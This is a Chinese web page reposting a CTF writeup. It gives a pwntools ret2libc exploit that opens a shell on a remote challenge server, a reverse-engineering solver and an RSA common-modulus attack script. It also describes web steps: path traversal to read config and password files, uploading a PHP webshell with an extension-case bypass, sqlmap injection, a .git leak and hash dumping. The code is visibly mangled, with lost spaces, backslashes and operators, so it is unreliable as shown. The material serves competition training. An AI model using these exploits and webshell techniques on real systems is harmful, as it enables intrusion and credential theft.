这篇文章将为大家详细讲解有关几道CTF题的writeup,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。这是一道比较简单的PWN题目,首先拖到IDA里简单看了一下程序,如图
发现在读取,没有栈保护,所以,在read0x34时,可能替换game返回址址,先通过write(1,write,4)(game作为write返回地址)。这样读出write地址,这样就可以得到system地址,因为又循环运行了,同样在0x804A06C写入/bin/sh�,这样system就能运行。Pythonexp如下:frompwn import *defrungameAgainPoc(p,yourname,flag): p.recvuntil(“First,what’s your name?n”) p.send(yourname+ “n”) p.recvuntil(“doyou want to get flag?n”) p.send(flag)pwnelf= ELF(“./pwn”)libcelf= ELF(“./libc-2.23.so”)gameadd= 0x080485CBplt_write= pwnelf.symbols[‘write’]got_write= pwnelf.got[‘write’]#p= process(‘./pwn’,env={‘LD_PRELOAD’:’./libc-2.23.so’})p= remote(‘117.50.60.184’, 12345)rungameAgainPoc(p,”ichuqiu”,”0″*32+ p32(plt_write)+ p32(gameadd)+ p32(1) + p32(got_write) + p32(4))write_addr= u32(p.recv(4))print”pwn write ” ,hex(write_addr)libcelf_system_add= libcelf.symbols[“system”] + write_addr- libcelf.symbols[“write”]print”pwn libcelf_system_add”,hex(libcelf_system_add)rungameAgainPoc(p,”/bin/sh�”,”0″*32+ p32(libcelf_system_add)+p32(gameadd)+ p32(0x804A06C))p.interactive()flag{62c51c85-1516-4ad8-989c-58ce8c29642e}0x02 AntidbgIDA查找关键函数,发现有一个循环比较初步判断,是一个8位数,于是分开比较
#[ebp+var_6C]01050D02070106010206000B07010C06#[ebp+var_4C]02080602#[ebp+var_5C]0100070D020108080D000103040D0303#[ebp+var_48]02050009#[ebp+var_44]00000D02defcover(buf): buf= buf.decode(“hex”) rbuf= “” fori in range(len(buf) – 1,-1,-1): rbuf+= buf[i] returnrbufdefcover_hex_lines(buf): returnbuf.replace(“”,””).replace(“r”,””).replace(“n”,””).decode(“hex”)var_6c=cover(“01050D02070106010206000B07010C06”) +cover(“0100070D020108080D000103040D0303”) +cover(“02080602”) + cover(“02050009”) +cover(“00000D02”)#printlen(var_6c)byte_402178= “””02 02 02 02 03 01 01 020101 02 01 01 00 01 01 02 02 00 01 01 01 01 000101 02 02 00 01 01 02 02 01 01 01 01 01 02 010103 00 00 00 00 00 00 00 00 00 00 00 00 00 000303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 010000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 004800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 002C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 004017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 000E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00A000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 30 40 00E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 000000 00 00 00 00 00 00 00 01 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00″””.replace(“”,””).replace(“r”,””).replace(“n”,””).decode(“hex”)byte_402138= “””00 00 00 00 01 00 00 000200 00 00 03 00 00 00 04 00 00 00 05 00 00 000600 00 00 07 00 00 00 08 00 00 00 09 00 00 000A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 000E00 00 00 0F 00 00 00″””.replace(“”,””).replace(“r”,””).replace(“n”,””).decode(“hex”)dword_403018=”””0200 00 00 02 00 00 000200 00 00 02 00 00 00 00 00 00 00 00 00 00 00″””.replace(“”,””).replace(“r”,””).replace(“n”,””).decode(“hex”)#text:0040110E mov ecx, [ebp+var_4]#.text:00401111 xor ecx, ebp#.text:00401113 mov dword_40301C, 3#.text:0040111D mov dword_403020, 6#.text:00401127 mov dword_403024, 7#内存值有所改变,所以修改一下dword_403018= dword_403018[0:4] + ‘x03′ + dword_403018[5:8] +’x06’ + dword_403018[9:12] + ‘x07’ +dword_403018[13:]printdword_403018.encode(“hex”)fori in range(0,42): hightnum= ord(dword_403018[ord(byte_402178[i])*4])
numbershow= hightnum+ ord(byte_402138[ord(var_6c[i])*4]) printchr(numbershow),flag{06b16a72-51cc-4310-88ab-70ab68290e22}0x03 sqli本题是sql约束攻击,注册用户名为“admin ”,密码为符合规定的密码就可以,然后登陆就能看到flagflag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}0x04 RSAopensslrsa -inform PEM -in pubkey1.pem -pubin -textPublic-Key:(2048 bit)Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17Exponent:2333 (0x91d)opensslrsa -inform PEM -in pubkey2.pem -pubin -textPublic-Key:(2048 bit)Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17Exponent:23333 (0x5b25).可见,这两个公钥n是一样的,只是e不同,使用RSA的共模攻击Python如下:fromlibnum import n2s,s2nfromgmpy2 import invertimportbase64importgmpy2defbignumber(n): n= n.decode(“hex”) rn= 0 forb in n: rn= rn
rn+= ord(b) returnrnn =”””00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:42:17″”” .replace(“:”,””).replace(“”,””).replace(“r”,””).replace(“n”,””)#printnn =bignumber(n)printhex(n)e1= 2333e2=23333defegcd(a,b): ifa == 0: return(b,0,1) else: g,y,x= egcd(b%a,a) return(g,x – (b //a)*y,y)flag1 = base64.b64decode(open(“flag1.enc”,”rb”).read())flag2 = base64.b64decode(open(“flag2.enc”,”rb”).read())c1= s2n(flag1)c2= s2n(flag2)c2= invert(c2,n)#s= egcd(e1,e2)#printss =gmpy2.gcdext(e1,e2)#printss1= s[1]s2= 0 – s[2]prints1prints2m =pow(c1,s1,n) * pow(c2,s2,n)%nprintn2s(m)flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}0x05 抛砖引玉1.根据CMS版本,在wooyun镜像站找到漏洞细节,网站存在注入,但是数据库用户表为空,另外发现发现文件下载漏洞,down.php?urls=data/../config.php下载文件发现DB_user/mvoa用户的密码define(‘DB_PWD’,’B!hpp3Dn1.’);flag值:B!hpp3Dn1.2.http://url/www.zip,获得网站备份文件,在config.php发现DB_user/root用户的密码define(‘DB_PWD’,’mypasswd’);flag值:mypasswd0x06 暗度陈仓1.发现下载路径/u-are-admin/download.php?dl=显示文件找不到(u-Are-Admin/u-upload-file文件夹),发现关键目录/u-Are-Admin/flag值:/u-Are-Admin/2.在/u-Are-Admin/目录,可以上传文件,上传Php(大小写绕过)一句话木马,菜刀链接,netuser查看系统管理员Hack用户的全名flag值:Hacked3563.shell能够直接查看超级管理员用户桌面根目录admin.txt文件的内容flag值:ad16a159581c7085c771f0x07 瞒天过海1.AWVS扫到注入点/cat.php?id=2sqlmap直接能跑,通过注入即可获得后台管理员明文密码,serverlogflag值:serverlog2.注入也能获取root的密码hash,*21C5210729A90C69019F01FED76FAD4654F27167然后cmd5解密得rootserverflag值:rootserver3.登录进去,Downloadlog那里下载日志的地方,可以下载任意文件,可获取C盘根目录pa免费云主机域名ssword.txt内容/classes/downloadfile.php?file=../../../../../../password.txtflag值:c9c35cf409344312146fa7546a94d1a60x08 偷梁换柱1.AWVS扫到./git源码泄露,用工具GitHack下载所有源码,在数据库文件发现用户名,密码(adminAdmin@pgsql)flag值:Admin@pgsql2.用用户名密码登录,管理图片可以上传一句话木马的图片,然后看到图片的地址,把地址去掉small,即使文件真正地址,/admin/uploads/111.php.png直接菜刀链接,png也能当成php直接解析,然后虚拟终端netuser即可获得系统管理员ichunqiu用户的全名。3.菜刀能够直接查看/tmp/access.log的内容的前16位
0x09 反客为主1.扫描器扫到一个文件包含和一个大马的txt文件,然后getshell,构造路径为url/info/include.php?filename=..//sjk-uploads/UareHack.txt密码是a,拿到shell可以获取phpStudy目录下Documents.txt的内容2.拿到shell可以获取ichunqiu用户Desktop根目录password.txt的内容3.getshell后,传msf木马无法反弹,最后使用QuarksPwDump拿到了ichunqiu用户密码HASH,在线破解拿到密码78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::flag值:123qwe123关于几道CTF题的writeup就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
相关推荐: 怎么进行Apache Struts 2 远程代码执行漏洞CVE-2018-11776的分析
本篇文章给大家分享的是有关怎么进行Apache Struts 2 远程代码执行漏洞CVE-2018-11776的分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。Apache软件基金会在Apach…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。
微信扫一扫 
